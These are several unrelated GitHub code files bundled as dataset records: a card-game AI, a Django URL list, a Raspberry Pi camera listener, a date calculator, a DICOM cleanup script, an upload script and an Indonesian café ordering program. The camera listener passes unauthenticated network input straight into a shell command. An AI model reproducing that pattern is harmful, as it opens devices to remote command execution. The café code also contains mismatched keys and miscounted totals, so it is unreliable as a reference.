the jack when the other is jack\n random_index = get_random_card_index(other_player_cards, already_peeked_indexes)\n already_peeked_indexes.append(random_index)\n worst_card_idx = get_worst_combinaison_of_cards_index(cards)\n self._trigger_jack_effect(worst_card_idx, random_index, thrown_cards)\n\n def apply_queen_effect(thrown_cards: List[Card], cards: List[Card], deck_card: Card):\n \"\"\" apply effect on all queen cards.\n \"\"\"\n cards = cards.copy() + [deck_card]\n for c in thrown_cards:\n if c.rank == Rank.QUEEN:\n for i in range(len(cards)):\n card = cards[i]\n if not card.is_discovered():\n print(f'DISCOVER {card}')\n self._trigger_queen_effect(i)\n break\n\n apply_jack_effect(thrown_cards, cards, other_player_cards)\n apply_queen_effect(thrown_cards, cards, deck_card)\n\n def is_a_great_card(card: Card) -> bool:\n r = card.rank\n return r == Rank.TEN or r == Rank.ACE or r == Rank.TWO\n\n def check_kobo(cards: List[Card]) -> bool:\n for c in cards:\n if not is_a_great_card(c):\n return False\n return True\n \n def throw_deck_card(deck_card: Card):\n \"\"\" plays the peeked deck card.\n Applies substitutions and effects on cards.\n \"\"\"\n thrown_cards = self._do_not_substitute_card(deck_card)\n apply_card_effects(thrown_cards, self.cards, self.game.ai_player.cards, deck_card)\n if check_kobo(self.cards):\n self.is_kobo = True\n return thrown_cards\n\n def throw_player_card(card_index: int, deck_card: Card):\n \"\"\" plays a card within the cards of the player.\n Applies substitutions and effects on cards.\n \"\"\"\n thrown_cards = self._substitute_card(card_index, deck_card)\n apply_card_effects(thrown_cards, self.cards, self.game.ai_player.cards, deck_card)\n if check_kobo(self.cards):\n self.is_kobo = True\n return thrown_cards\n\n\n player = self.game.player\n cards = [c for c in self.cards if c.is_discovered()]\n hidden_card_index = get_hidden_card_index(self.cards)\n\n # handle kobo\n if player.is_kobo:\n if deck_card.rank == Rank.JACK: # deck card is jack\n return throw_deck_card(deck_card)\n else:\n jack_index = get_first_card_index(cards, Rank.JACK)\n if jack_index == -1: # found a jack in cards\n return throw_player_card(jack_index, deck_card)\n \n # handle queen\n if deck_card.rank == Rank.QUEEN:\n print('QUEEN DECK')\n return throw_deck_card(deck_card)\n else:\n queen_index = get_first_card_index(cards, Rank.QUEEN)\n if queen_index != -1: # found a queen\n if hidden_card_index != -1: # found 1 hidden card\n print('QUEEN CARDS')\n return throw_player_card(queen_index, deck_card)\n\n # handle hidden cards discover\n if hidden_card_index != -1: # found a hidden card\n print('HIDDEN')\n return throw_player_card(hidden_card_index, deck_card)\n \n # handle every cards are great\n cards_with_deck_card = cards + [deck_card]\n best_hit_index = get_best_hit_index(cards_with_deck_card)\n best_hit_card = cards_with_deck_card[best_hit_index]\n if is_a_great_card(best_hit_card): # all cards are great\n self.is_kobo = True\n best_hit_index = get_worst_combinaison_of_cards_index(cards_with_deck_card)\n if best_hit_index == len(cards_with_deck_card) - 1: # best hit is the deck card\n print('KOBO DECK')\n return throw_deck_card(deck_card)\n else:\n print('KOBO CARDS')\n return throw_player_card(best_hit_index, deck_card)\n\n # handle deck card is a card we already have\n deck_card_index = get_first_card_index(cards, deck_card.rank)\n if deck_card_index != -1 and not is_a_great_card(deck_card):\n print('ALREADY HAVE THIS CARD')\n return throw_deck_card(deck_card)\n\n # default turn\n best_hit_index = get_best_hit_index(cards_with_deck_card)\n if best_hit_index == len(cards_with_deck_card) - 1: # best hit is the deck card\n print('CLASSIC DECK')\n return throw_deck_card(deck_card)\n else:\n print('CLASSIC CARDS')\n return throw_player_card(best_hit_index, deck_card)\n \n\n def display_cards(self, visible_cards: List[int]=[]):\n print(Colors.BOLD)\n print(Colors.FAIL)\n print('AI cards')\n super().display_cards(visible_cards=visible_cards)\n print(Colors.ENDC)\n\n def _display_deck_card(self, card: Card):\n print(Colors.FAIL)\n super()._display_deck_card(card)\n\n\ng = Game()\ng.launch()","repo_name":"TristanBilot/kobo_ai","sub_path":"kobo_ai.py","file_name":"kobo_ai.py","file_ext":"py","file_size_in_byte":21124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33688094768","text":"from django.contrib.auth import views as auth_views\nfrom django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('site-admin/', views.admin, name='system-admin'),\n path('', views.home_view, name='home'),\n path('about/', views.about, name='about'),\n path('contact/', views.contact, name='contact'),\n path('success/', views.success, name='success'),\n path('car-hiring//', views.car_hiring_detail, name='hiring-detail'),\n path('page-not-found/', views.four_or_four_page, name='page-not-found'),\n path('car-hire-success/', views.car_hire_success, name='car-success'),\n path('room-book-success/', views.room_success, name='room-success'),\n path('gen-pdf/', views.generate_pdf, name='gen-pdf'),\n path('gen-pdf/', views.generate_pdf_room, name='gen-pdf-room'),\n path('car-hirings/', views.car_hirings, name='hirings'),\n path('room-bookings/', views.room_bookings, name='bookings'),\n path('room-bookings//', views.room_booking_detail, name='booking-detail'),\n\n path('logout/', views.logout_view, name='logout'),\n path('login/', views.admin_login, name='login'),\n]","repo_name":"Chaumulusa/money","sub_path":"src/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5656185810","text":"#!/usr/bin/python\n# socket code adapted from Richard Garsthagen's scripts at pi3dscan.com\n# NOTE: look into python socketserver module or tornado library to handle sockets\n# 12/19/16\n\nimport socket\nimport struct\nimport subprocess\nimport time\nimport datetime\nimport picamera\n\npixels = (2592, 1944)\nframerate = 1\nled = False\nvflip = True\nhflip = True\nmeter_mode = 'backlit'\niso = 100\n\n\ndef config_socket():\n MCAST_GRP = '225.1.1.1'\n MCAST_PORT = 3179\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n # '' is a symbolic name for host parameter that means all available interfaces\n sock.bind(('', MCAST_PORT))\n mreq = struct.pack(\"4sl\", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\n\n return sock\n\ndebug = 1 # Turn debug message on/off\n\n\nif __name__ == '__main__':\n sock = config_socket()\n\n while True:\n print(\"listening...\")\n data = sock.recv(10240).decode()\n rdata = data[1:]\n rcmd = ord(data[0])\n\n if debug == 1:\n print(\"Received cmd: {}\".format(str(rcmd)))\n print(\"Data: {}\".format(rdata))\n\n if rcmd == 1 and rdata:\n print(\"shooting still @ {}\".format(datetime.datetime.now().strftime(\"%H:%M:%S\")))\n cmd = \"raspistill \" + rdata\n pid = subprocess.call(cmd, shell=True)\n print(\"done shooting still @ {}\\n\".format(datetime.datetime.now().strftime(\"%H:%M:%S\")))\n\n elif rcmd == 1:\n with picamera.PiCamera(resolution=pixels, framerate=framerate) as picam:\n picam.iso = iso\n picam.led = led\n picam.vflip = vflip\n picam.hflip = hflip\n picam.meter_mode = meter_mode\n\n print(\"calibrating picam instance\")\n time.sleep(5)\n\n print(\"shooting still @ {}\".format(datetime.datetime.now().strftime(\"%H:%M:%S\")))\n picam.capture('/home/pi/tests/socket_pics/test02-{}.jpg'.format(socket.gethostname()))\n print(\"done shooting still @ {}\\n\".format(datetime.datetime.now().strftime(\"%H:%M:%S\")))\n","repo_name":"barlaensdoonn/photogrammetric-timelapse","sub_path":"old_sockets/picnic.py","file_name":"picnic.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70016434669","text":"from dataclasses import dataclass\n\n\ndef get_max_day(year, month):\n\n if month in (1, 3, 5, 7, 8, 10, 12):\n max_day = 31\n elif month in (4, 6, 9, 11):\n max_day = 30\n else:\n if not year % 100:\n if not year % 400:\n max_day = 29\n else:\n max_day = 28\n elif not year % 4:\n max_day = 29\n else:\n max_day = 28\n return max_day\n\n\n@dataclass\nclass Date:\n year: int\n month: int\n day: int\n\n def increment(self):\n\n year, month, day = self.year, self.month, self.day\n\n max_day = get_max_day(year, month)\n\n # perform the increment\n if day + 1 > max_day:\n day = 1\n if month < 12:\n month += 1\n else:\n month = 1\n year += 1\n else:\n day = day + 1\n\n # save\n self.year, self.month, self.day = year, month, day\n\n def __gt__(self, other):\n return 1000 * self.year + 50 * self.month + self.day > \\\n 1000 * other.year + 50 * other.month + other.day\n\n def validate(self):\n return all([self.month > 0, self.month <= 12, get_max_day(self.year, self.month) >= self.day])\n\n\ndef parse(strfdate):\n d, m, y = strfdate.split('/')\n return Date(year=int(y), month=int(m), day=int(d))\n\n\ndef calculate(date_from, date_to):\n date_0, date_1 = parse(date_from), parse(date_to)\n\n if date_0 > date_1:\n date_0, date_1 = date_1, date_0\n\n delta = 0\n\n while date_1 != date_0:\n delta += 1\n date_0.increment()\n # DEBUG\n # print(f\"{date_0.year}-{date_0.month}-{date_0.day}\")\n\n return delta - 1\n","repo_name":"gotexis/test-sypht","sub_path":"date/date_calculate.py","file_name":"date_calculate.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23255026609","text":"import os\nimport sys\nimport argparse\nimport time\nfrom dataset import RSNAIntracranialDataset, normalized_dicom_pixels\nimport pydicom\n\nparser = argparse.ArgumentParser(\n description='Remove corrupted DICOM')\nparser.add_argument('--dir', '-d',\n dest=\"dir\",\n metavar='DIR',\n help='path to directory containing dcm files',\n default='E:/cq500')\nparser.add_argument('--log_interval',\n dest=\"log_interval\",\n metavar='LOG_INTERVAL',\n help='how often to print updates to stdout',\n default=1000)\nargs = parser.parse_args()\n\nprint(f'Removing corrupted DICOM files at {args.dir}')\n\nstart = time.time()\n\nfiles = [os.path.join(dp, f)\n for dp, dn, fn in os.walk(os.path.expanduser(args.dir))\n for f in fn\n if f.endswith('.dcm')]\n\nprint(f'Processing {len(files)} files...')\n\nnum_removed = 0\nfor i, file in enumerate(files):\n try:\n x = pydicom.dcmread(file, stop_before_pixels=False)\n x = normalized_dicom_pixels(x)\n if x.shape != (1, 512, 512):\n raise ValueError('wrong shape')\n except:\n path = os.path.join(args.dir, file)\n os.remove(path)\n num_removed += 1\n print(f'Removed corrupted {path}: {sys.exc_info()}')\n if i > 0 and i % args.log_interval == 0:\n print(f'Processed {i}/{len(files)}')\n\nelapsed = time.time() - start\nprint(f'Removed {num_removed} corrupt examples in {elapsed} seconds')\n","repo_name":"thavlik/machine-learning-portfolio","sub_path":"src/remove-corrupt-dcm.py","file_name":"remove-corrupt-dcm.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"16451874197","text":"import requests\r\nfrom datetime import datetime\r\n\r\nfrom db_mufap import MFDatabase\r\n\r\ndb = MFDatabase()\r\n# db.update_fundlist()\r\ncutoff_date = datetime(2023, 7, 22)\r\ndb.update_attached(cutoff_date)\r\n\r\n\r\n\r\n# upload\r\nusername = 'msaadat'\r\ntoken = '##########################'\r\n\r\nfl = db.path_db_attach.name\r\ndest = f\"https://www.pythonanywhere.com/api/v0/user/{username}/files/path/home/{username}/mysite/{fl}\"\r\n\r\nf = open(fl,'rb')\r\ncontent = f.read()\r\nf.close()\r\nresponse = requests.post(\r\n dest,\r\n files={'content': content},\r\n headers={'Authorization': f'Token {token}'}\r\n)\r\n\r\nprint(response)\r\n\r\n# merge local \r\ndb.merge_attached(cutoff_date)\r\ndb.path_db_attach.unlink()\r\n\r\n# merge on server\r\n\r\nresponse = requests.post(\r\n \"http://msaadat.pythonanywhere.com/merge\",\r\n # \"http://localhost:8000/merge\",\r\n json={'cutoff_date': cutoff_date.isoformat()},\r\n)\r\n\r\nprint(response.content)\r\n\r\ndb.close()","repo_name":"msaadat/mfperf","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6215003723","text":"from os import system\r\nimport datetime\r\n\r\n#2109106039\r\n\r\nHargaTotal = 0\r\nDiskon = 0\r\nIntro = 0\r\nMenuAwal = 0\r\nMakanan = 0\r\nMinuman = 0\r\nPesanan = {}\r\nPesananCair = {}\r\n\r\nday = datetime.datetime.today().weekday()\r\nif day <= 4:\r\n Diskon += 10\r\nelse:\r\n Diskon += 5\r\n\r\n#IC = Ivory Coins, Mata uang negara entah negara mana ini\r\n\r\ndef Banner():\r\n print(100 * \"*\")\r\n print(\"\\033[1;36;40mCafé Pour La Tâche\\033[0;37;40m\".center(100, \" \"))\r\n print(100 * \"*\")\r\n\r\ndef clear():\r\n _ = system('cls')\r\n_ = system('')\r\n \r\n\r\nwhile MenuAwal == 0:\r\n if Intro == 0:\r\n print(100 * \"*\")\r\n print(\"\\033[1;36;40mWelcome to our Café, Comrade!\\033[0;37;40m\".center(100, \" \"))\r\n print(100 * \"*\")\r\n\r\n print(\"\\n\\033[0;33;40m V: \\\"Saya, Viabel, akan membimbing Anda dalam melakukan pemesanan~\\\"\\033[0;37;40m\\n\")\r\n Intro += 1\r\n else:\r\n Banner()\r\n\r\n print(\"\"\" Berikut Opsi Jenis Menu yang dapat Anda pilih:\r\n [1] Menu Makanan\r\n [2] Menu Minuman\r\n [3] Menu Pembayaran\"\"\")\r\n print(\"\\033[0;33;40m V: \\\"Ketik angka di depan menu, contoh: 1 (untuk makanan)\\\"\\033[0;37;40m\")\r\n Home = input(\" Pilihan saya: \")\r\n if Home == \"1\":\r\n Food = 0\r\n while Food == 0:\r\n clear()\r\n Banner()\r\n print(\"\"\" Berikut Daftar Makanan beserta Harganya:\r\n [1] Strawberry Parfait\\t [10 IC]\\t <-- Recommendation\r\n [2] Red Velvet Cake\\t [13 IC]\r\n [3] Dark Chocolate Cake\\t [14 IC]\r\n [4] Summery Fruit Salad\\t [ 8 IC]\r\n [5] Black Sesame Tart\\t [10 IC]\r\n [6] Chocolate Truffle\\t [ 4 IC]\r\n \"\"\")\r\n print(\"\\033[0;33;40m V: \\\"Pembelian 2 makanan atau lebih bisa dapat diskon 5% loh!\\033[0;37;40m\")\r\n print(\"\\033[0;33;40m V: \\\"Ketik angka di depan menu, contoh: 1 (untuk parfait)\\\"\\033[0;37;40m\")\r\n print(\"\\033[0;33;40m V: \\\"Untuk mengubah pesanan, pilih kembali pesanan dan ketik jumlah yang diinginkan\\\"\\033[0;37;40m\")\r\n print(\"\\033[0;33;40m V: \\\"Ketik \\\"Kembali\\\" atau \\\"0\\\" untuk kembali ke daftar menu utama\\033[0;37;40m\")\r\n\r\n FoodChoice = str(input(\" Pilihan saya: \"))\r\n\r\n if FoodChoice == \"1\":\r\n if 'Strawberry Parfait' in Pesanan:\r\n HargaTotal -= 10 * SParf\r\n Makanan -= SParf\r\n Pesanan.pop('Strawberry Parfait') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n SParf = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if SParf >= 1:\r\n Pesanan['Strawberry Parfait'] = SParf\r\n HargaTotal += 10 * SParf\r\n Makanan += SParf\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif FoodChoice == \"2\":\r\n if 'Red Velvet Cake' in Pesanan:\r\n HargaTotal -= 13 * RVCake\r\n Makanan -= RVCake\r\n Pesanan.pop('Red Velvet Cake') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n RVCake = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if RVCake >= 1:\r\n Pesanan['Red Velvet Cake'] = RVCake\r\n HargaTotal += 13 * RVCake\r\n Makanan += RVCake\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif FoodChoice == \"3\":\r\n if 'Dark Chocolate Cake' in Pesanan:\r\n HargaTotal -= 14 * DCCake\r\n Makanan -= DCCake\r\n Pesanan.pop('Dark Chocolate') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n DCCake = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if DCCake >= 1:\r\n Pesanan['Dark Chocolate Cake'] = DCCake\r\n HargaTotal += 14 * DCCake\r\n Makanan += DCCake\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif FoodChoice == \"4\":\r\n if 'Summery Fruit Salad' in Pesanan:\r\n HargaTotal -= 8 * SFSalad\r\n Makanan -= SFSalad\r\n Pesanan.pop('Summery Fruit Salad') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n SFSalad = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if SFSalad >= 1 :\r\n Pesanan['Summery Fruit Salad'] = SFSalad\r\n HargaTotal += 8 * SFSalad\r\n Makanan += SFSalad\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif FoodChoice == \"5\":\r\n if 'Black Sesame Tart' in Pesanan:\r\n HargaTotal -= 10 * BSTart\r\n Makanan -= BSTart\r\n Pesanan.pop('Black Sesame Tart') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n BSTart = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if BSTart >= 1:\r\n Pesanan['Black Sesame Tart'] = BSTart\r\n HargaTotal += 10 * BSTart\r\n Makanan += BSTart\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif FoodChoice == \"6\":\r\n if 'Chocolate Truffle' in Pesanan:\r\n HargaTotal -= 4 * CTruff\r\n Makanan -= CTruff\r\n Pesanan.pop('Chocolate Truffle') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n CTruff = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if CTruff >= 1:\r\n Pesanan['Chocolate Truffle'] = CTruff\r\n HargaTotal += 4 * CTruff\r\n Makanan += CTruff\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif FoodChoice.casefold() == \"kembali\" or FoodChoice == \"0\":\r\n clear()\r\n break\r\n\r\n else:\r\n print(\"\\n\\033[0;33;40m V: \\\"Hei.. Kami tidak memiliki menu rahasia seperti yang Anda pikirkan..\\\"\\033[0;37;40m\")\r\n input()\r\n clear()\r\n \r\n\r\n \r\n\r\n elif Home == \"2\":\r\n Drink = 0\r\n while Drink == 0:\r\n clear()\r\n Banner()\r\n print(\"\"\" Berikut Daftar Minuman beserta Harganya:\r\n [1] Mineral Water\\t [1 IC]\r\n [2] Dalgona Coffee\\t [4 IC]\r\n [3] Mixed Fruits Juice\\t [2 IC]\r\n [4] Mixed Veggies Juice\\t [2 IC]\r\n [5] Thai Tea \\t\\t [4 IC]\r\n [6] White Coffee\\t [3 IC] <-- Recommendation\r\n [7] Irish Coffe\\t\\t [4 IC] <-- Recommendation\r\n [8] Caffé Latte\\t\\t [3 IC]\r\n [9] Espresso Macchiato\\t [3 IC]\r\n [10] Lemon Squash\\t [3 IC] \r\n [11] O (Coffee)\\t\\t [2 IC]\r\n [12] Valencia Fizz\\t [3 IC]\r\n [13] Electrolyte Drinks\\t [7 IC]\r\n \"\"\")\r\n print(\"\\033[0;33;40m V: \\\"Pembelian 3 minuman atau lebih bisa dapat diskon 10% loh!\\033[0;37;40m\")\r\n print(\"\\033[0;33;40m V: \\\"Ketik angka di depan menu, contoh: 1 (untuk Mineral Water)\\\"\\033[0;37;40m\")\r\n print(\"\\033[0;33;40m V: \\\"Untuk mengubah pesanan, pilih kembali pesanan dan ketik jumlah yang diinginkan\\\"\\033[0;37;40m\")\r\n print(\"\\033[0;33;40m V: \\\"Ketik \\\"Kembali\\\" atau \\\"0\\\" untuk kembali ke daftar menu utama\\033[0;37;40m\")\r\n\r\n DrinkChoice = str(input(\" Pilihan saya: \"))\r\n\r\n if DrinkChoice == \"1\":\r\n if 'Mineral Water' in PesananCair:\r\n HargaTotal -= 1 * MWat\r\n Minuman -= MWat\r\n PesananCair.pop('Mineral Water') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n MWat = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if MWat >= 1:\r\n PesananCair['Mineral Water'] = MWat\r\n HargaTotal += 1 * MWat\r\n Minuman += MWat\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"2\":\r\n if 'Dalgona Coffee' in PesananCair:\r\n HargaTotal -= 4 * DCof \r\n Minuman -= DCof\r\n PesananCair.pop('Dalgona Coffee') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n DCof = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if DCof >= 1:\r\n PesananCair['Dalgona Coffee'] = DCof\r\n HargaTotal += 4 * DCof\r\n Minuman += DCof\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n \r\n elif DrinkChoice == \"3\":\r\n if 'Mixed Fruits Juice' in PesananCair:\r\n HargaTotal -= 2 * MXJuice\r\n Minuman -= MXJuice\r\n PesananCair.pop('Mixed Fruits Juice') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n MXJuice = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if MXJuice >= 1:\r\n PesananCair['Mixed Fruits Juice'] = MXJuice\r\n HargaTotal += 2 * MXJuice\r\n Minuman += MXJuice\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n \r\n elif DrinkChoice == \"4\":\r\n if 'Mixed Veggies Juice' in PesananCair:\r\n HargaTotal -= 2 * MVJuice\r\n Minuman -= MVJuice\r\n PesananCair.pop('Mixed Veggies Juices') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n MVJuice = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if MVJuice >= 1:\r\n PesananCair['Mixed Veggies Juice'] = MVJuice\r\n HargaTotal += 2 * MXJuice\r\n Minuman += MXJuice\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n \r\n elif DrinkChoice == \"5\":\r\n if 'Thai Tea' in PesananCair:\r\n HargaTotal -= 4 * TTea\r\n Minuman -= TTea\r\n PesananCair.pop('Thai Tea') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n TTea = int(input(\" Berapa banyak pesanan Anda?\"))\r\n if TTea >= 1:\r\n PesananCair['Thai Tea'] = TTea\r\n HargaTotal += 4 * TTea \r\n Minuman += TTea\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"6\":\r\n if 'White Coffee' in PesananCair:\r\n HargaTotal -= 3 * WCof \r\n Minuman -= WCof\r\n PesananCair.pop('White Coffee') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n WCof = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if WCof >= 1:\r\n PesananCair['White Coffee'] = WCof\r\n HargaTotal += 3 * WCof\r\n Minuman += WCof\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n \r\n elif DrinkChoice == \"7\":\r\n if 'Irish Coffee' in PesananCair:\r\n HargaTotal -= 4 * ICof \r\n Minuman -= ICof\r\n PesananCair.pop('Irish Coffee') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n ICof = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if ICof >= 1:\r\n PesananCair['Irish Coffee'] = ICof\r\n HargaTotal += 4 * ICof\r\n Minuman += ICof\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"8\":\r\n if 'Caffe Lattee' in PesananCair:\r\n HargaTotal -= 3 * CLatte\r\n Minuman -= CLatte\r\n PesananCair.pop('Caffe Latte') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n CLatte = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if CLatte >= 1:\r\n PesananCair['Caffe Latte'] = CLatte\r\n HargaTotal += 3 * CLatte\r\n Minuman += CLatte\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"9\":\r\n if 'Espresso Macchiato' in PesananCair:\r\n HargaTotal -= 3 * EMac\r\n Minuman -= EMac\r\n PesananCair.pop('Espresso Macchiato') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n EMac = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if EMac >= 1:\r\n PesananCair['Espresso Macchiato'] = EMac\r\n HargaTotal += 3 * EMac\r\n Minuman += EMac\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"10\":\r\n if 'Lemon Squash' in PesananCair:\r\n HargaTotal -= 3 * LSqua\r\n Minuman -= LSqua\r\n PesananCair.pop('Lemon Squash') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n LSqua = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if LSqua >= 1:\r\n PesananCair['Lemon Squash'] = LSqua\r\n HargaTotal += 3 * LSqua\r\n Minuman += LSqua\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"11\":\r\n if 'O (Coffee)' in PesananCair:\r\n HargaTotal -= 2 * OCof \r\n Minuman -= OCof\r\n PesananCair.pop('O (Coffee)') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n OCof = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if OCof >= 1:\r\n PesananCair['O (Coffee)'] = OCof\r\n HargaTotal += 2 * OCof\r\n Minuman += OCof\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n \r\n elif DrinkChoice == \"12\":\r\n if 'Valencia Fizz' in PesananCair:\r\n HargaTotal -= 3 * VFizz \r\n Minuman -= VFizz\r\n PesananCair.pop('Valencia Fizz') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n VFizz = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if VFizz >= 1:\r\n PesananCair['Valencia Fizz'] = VFizz\r\n HargaTotal += 3 * VFizz \r\n Minuman += VFizz\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"13\":\r\n if 'Electrolyte Drinks' in PesananCair:\r\n HargaTotal -= 7 * EDrink\r\n Minuman -= EDrink\r\n PesananCair.pop('Electrolyte Drinks') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n EDrink = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if EDrink >= 1:\r\n PesananCair['Electrolyte Drinks'] = EDrink\r\n HargaTotal += 7 * EDrink\r\n Minuman += EDrink\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice.casefold() == \"kembali\" or DrinkChoice == \"0\" :\r\n clear()\r\n break\r\n\r\n else:\r\n print(\"\\n\\033[0;33;40m V: \\\"Hei.. Kami tidak memiliki menu rahasia seperti yang Anda pikirkan..\\\"\\033[0;37;40m\")\r\n input()\r\n clear()\r\n\r\n elif Home == \"3\":\r\n while MenuAwal == 0:\r\n clear()\r\n Banner()\r\n print(\" Daftar Pesanan Anda: \\n\")\r\n for Menu, value in Pesanan.items():\r\n print (\" \", Menu,'sebanyak',value, 'pcs')\r\n for Menu, value in PesananCair.items():\r\n print (\" \", Menu,'sebanyak',value, 'gelas')\r\n GrandFinale = str(input(\"\\n Lanjut ke proses pembayaran (yes/no)? \"))\r\n if GrandFinale.casefold() == \"yes\" or GrandFinale.casefold() == \"ya\" or GrandFinale.casefold() == \"y\":\r\n Emoney = str(input(\"\\n Apa anda ingin membayar dengan e-money(yes/no)? \"))\r\n if Emoney.casefold() == \"yes\" or Emoney.casefold() == \"ya\" or Emoney.casefold() == \"y\":\r\n Diskon += 5\r\n print()\r\n elif Emoney.casefold() == \"no\" or Emoney.casefold() == \"tidak\" or Emoney.casefold() == \"n\":\r\n print()\r\n else:\r\n print(\" Menu pembayaran\",Emoney,\"tidak ada, jawaban otomatis: tidak\")\r\n input()\r\n clear()\r\n Banner()\r\n 